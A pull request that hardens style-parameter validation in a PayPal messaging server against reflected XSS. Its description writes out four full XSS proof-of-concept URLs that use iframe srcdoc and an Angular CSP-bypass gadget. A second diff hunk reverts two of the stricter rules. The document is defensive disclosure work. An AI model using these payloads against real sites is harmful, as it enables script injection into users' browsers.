### PR TITLE
refactor: XSS Mitigation

### DIFF
--- a/server/locale/DE/validOptions.js
+++ b/server/locale/DE/validOptions.js
@@ -9,10 +9,12 @@ export default {
             color: [Types.STRING, ['black', 'white']],
             size: [Types.NUMBER, [12, 10, 11, 13, 14, 15, 16]],
             fontFamily: [Types.STRING]
-        }
+        },
+        preset: [Types.STRING, ['smallest']]
     },
     flex: {
         color: [Types.STRING, ['blue', 'black', 'white', 'gray|grey']],
-        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']]
+        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']],
+        preset: [Types.STRING, ['smallest']]
     }
 };

--- a/server/locale/GB/validOptions.js
+++ b/server/locale/GB/validOptions.js
@@ -10,10 +10,12 @@ export default {
             color: [Types.STRING, ['black', 'white']],
             size: [Types.NUMBER, [12, 10, 11, 13, 14, 15, 16]],
             fontFamily: [Types.STRING]
-        }
+        },
+        preset: [Types.STRING, ['smallest']]
     },
     flex: {
         color: [Types.STRING, ['blue', 'black', 'white', 'gray|grey']],
-        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']]
+        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']],
+        preset: [Types.STRING, ['smallest']]
     }
 };

--- a/server/locale/US/validOptions.js
+++ b/server/locale/US/validOptions.js
@@ -10,24 +10,28 @@ export default {
             color: [Types.STRING, ['black', 'white', 'monochrome', 'grayscale|greyscale']],
             size: [Types.NUMBER, [12, 10, 11, 13, 14, 15, 16]],
             fontFamily: [Types.STRING]
-        }
+        },
+        preset: [Types.STRING, ['smallest']]
     },
     flex: {
         color: [
             Types.STRING,
             ['blue', 'black', 'white', 'white-no-border', 'gray|grey', 'monochrome', 'grayscale|greyscale']
         ],
-        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']]
+        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']],
+        preset: [Types.STRING, ['smallest']]
     },
     legacy: {
         typeNI: [Types.STRING, ['', 'image', 'html']],
         typeEZP: [Types.STRING, ['', 'html']],
-        size: [Types.STRING],
+        size: [Types.NUMBER, [12, 10, 11, 13, 14, 15, 16]],
         color: [Types.STRING, ['none', 'blue', 'black', 'gray|grey', 'white']],
-        border: [Types.BOOLEAN, [true, false]]
+        border: [Types.BOOLEAN, [true, false]],
+        preset: [Types.STRING, ['smallest']]
     },
     custom: {
         markup: [Types.STRING],
-        ratio: [Types.ANY]
+        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']],
+        preset: [Types.STRING, ['smallest']]
     }
 };

--- a/server/locale/US/validOptions.js
+++ b/server/locale/US/validOptions.js
@@ -24,14 +24,14 @@ export default {
     legacy: {
         typeNI: [Types.STRING, ['', 'image', 'html']],
         typeEZP: [Types.STRING, ['', 'html']],
-        size: [Types.NUMBER, [12, 10, 11, 13, 14, 15, 16]],
+        size: [Types.STRING],
         color: [Types.STRING, ['none', 'blue', 'black', 'gray|grey', 'white']],
         border: [Types.BOOLEAN, [true, false]],
         preset: [Types.STRING, ['smallest']]
     },
     custom: {
         markup: [Types.STRING],
-        ratio: [Types.STRING, ['1x1', '1x4', '8x1', '20x1']],
+        ratio: [Types.ANY],
         preset: [Types.STRING, ['smallest']]
     }
 };

--- a/server/validateStyle.js
+++ b/server/validateStyle.js
@@ -9,7 +9,10 @@ const logInvalidOption = (addLog, location, options, val) =>
     logInvalid(
         addLog,
         location,
-        `Expected one of ["${options.join('", "').replace(/\|[\w|]+/g, '')}"] but received "${val}".`
+        // Filter out potentially malicious inputs from warnings.
+        `Expected one of ["${options.join('", "').replace(/\|[\w|]+/g, '')}"] but received "${
+            /^[a-z0-9]+$/i.test(val) ? val : 'REDACTED'
+        }".`
     );
 
 function getValidVal(addLog, typeArr, val, location) {


### PR DESCRIPTION
# Description # 

XSS Mitigation on `style` parameter:

* Removes non-alphanumeric inputs from warnings array.
* Improves validation on the style parameters for each given layout. 

## Example warnings ##

When non-alphanumeric characters are detected, the invalid input is replaced with 'REDACTED'

`layout = &lt;script&gt;alert('hi')&lt;/script&gt;`: 
```
{
  "description": "Invalid option value (style.layout). Expected one of ['text', 'flex', 'legacy', 'custom'] 
  but received 'REDACTED'.",
  "timestamp": "1601315111307"
}
```

`layout = improper`
```
{
  "description": "Invalid option value (style.layout). Expected one of ['text', 'flex', 'legacy', 'custom'] 
  but received 'improper'.",
  "timestamp": "1601315111307"
}
```

## Test Requests ##

Example HTTP requests which resulted in a successful reflected XSS exploit prior to mitigation.

[Malicious 'preset'](https://localhost.paypal.com:8080/credit-presentment/smart/message?client_id=AStfVB9fkWPcZvUup9nN2je830RcobZgO5lq3zU-F_DPNb_XwsuWtugacD_X6uQYXYP4OuzmeNwhEe5q&currency=USD&style=%7B"layout":"text","preset":"</script>%5cu003ciframe/%5cu0073rcdoc=%27%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/6df/e5d576691405d66074a6d5794b36e/js/framework.js>%5cu003c/script>%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/lib/jquery-2.2.4.min.js>%5cu003c/script>%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/home-action.js>%5cu003c/script>%5cu003ce/ng-app/ng-csp/id=showRequestModalOnPageLoad>%5cu003ce/ng-click=$event.view.prompt%5cu0028$event.view.document.domain%5cu0029+id=callGetEC></e>%27>%5cu003c/iframe>","ratio":"%5cu0020sc=%27=x19"%7D)

> Parameter injected directly into DOM

[Malicious 'layout'](https://localhost.paypal.com:8080/credit-presentment/smart/message?client_id=AStfVB9fkWPcZvUup9nN2je830RcobZgO5lq3zU-F_DPNb_XwsuWtugacD_X6uQYXYP4OuzmeNwhEe5q&currency=USD&style=%7B%22preset%22:%22smallest%22,%22invalid%22:%22%3Ch1%3Ehey,hey%3C/h1%3E%22,%22layout%22:%22%3C/script%3E%5cu003ciframe/%5cu0073rcdoc=%27%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/6df/e5d576691405d66074a6d5794b36e/js/framework.js%3E%5cu003c/script%3E%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/lib/jquery-2.2.4.min.js%3E%5cu003c/script%3E%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/home-action.js%3E%5cu003c/script%3E%5cu003ce/ng-app/ng-csp/id=showRequestModalOnPageLoad%3E%5cu003ce/ng-click=$event.view.prompt%5cu0028$event.view.document.domain%5cu0029+id=callGetEC%3E%3C/e%3E%27%3E%5cu003c/iframe%3E%22,%22ratio%22:%22%5cu0020sc=%27=x19%22%7D)

> Parameter injected due to console warning message which displayed the erroneous layout param input.

[Malicious 'fontFamily](https://localhost.paypal.com:8080/credit-presentment/smart/message?client_id=AStfVB9fkWPcZvUup9nN2je830RcobZgO5lq3zU-F_DPNb_XwsuWtugacD_X6uQYXYP4OuzmeNwhEe5q&currency=USD&style=%7B%22layout%22:%22text%22,%22fontFamily%22:%22www.paypal.com/%3C/script%3E%5cu003ciframe/%5cu0073rcdoc=%27%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/6df/e5d576691405d66074a6d5794b36e/js/framework.js%3E%5cu003c/script%3E%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/lib/jquery-2.2.4.min.js%3E%5cu003c/script%3E%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/home-action.js%3E%5cu003c/script%3E%5cu003ce/ng-app/ng-csp/id=showRequestModalOnPageLoad%3E%5cu003ce/ng-click=$event.view.prompt%5cu0028$event.view.document.domain%5cu0029+id=callGetEC%3E%3C/e%3E%27%3E%5cu003c/iframe%3E%22,%22ratio%22:%22%5cu0020sc=%27=x19%22%7D)

> Attempted `www.paypal.com` and `www.paypalobjects.com` followed by: `/<malicious input>`

[Malicious 'markup'](https://localhost.paypal.com:8080/credit-presentment/smart/message?client_id=AStfVB9fkWPcZvUup9nN2je830RcobZgO5lq3zU-F_DPNb_XwsuWtugacD_X6uQYXYP4OuzmeNwhEe5q&currency=USD&style=%7B%22layout%22:%22custom%22,%22markup%22:%22%3C/script%3E%5cu003ciframe/%5cu0073rcdoc=%27%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/6df/e5d576691405d66074a6d5794b36e/js/framework.js%3E%5cu003c/script%3E%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/lib/jquery-2.2.4.min.js%3E%5cu003c/script%3E%5cu0026%23x3c%3Bscript/%5cu0073rc=/web/res/3eb/bbe9a83ac219389906fd52295b978/js/home-action.js%3E%5cu003c/script%3E%5cu003ce/ng-app/ng-csp/id=showRequestModalOnPageLoad%3E%5cu003ce/ng-click=$event.view.prompt%5cu0028$event.view.document.domain%5cu0029+id=callGetEC%3E%3C/e%3E%27%3E%5cu003c/iframe%3E%22,%22ratio%22:%22%5cu0020sc=%27=x19%22%7D)

> Custom layout with attempted XSS with `markup` parameter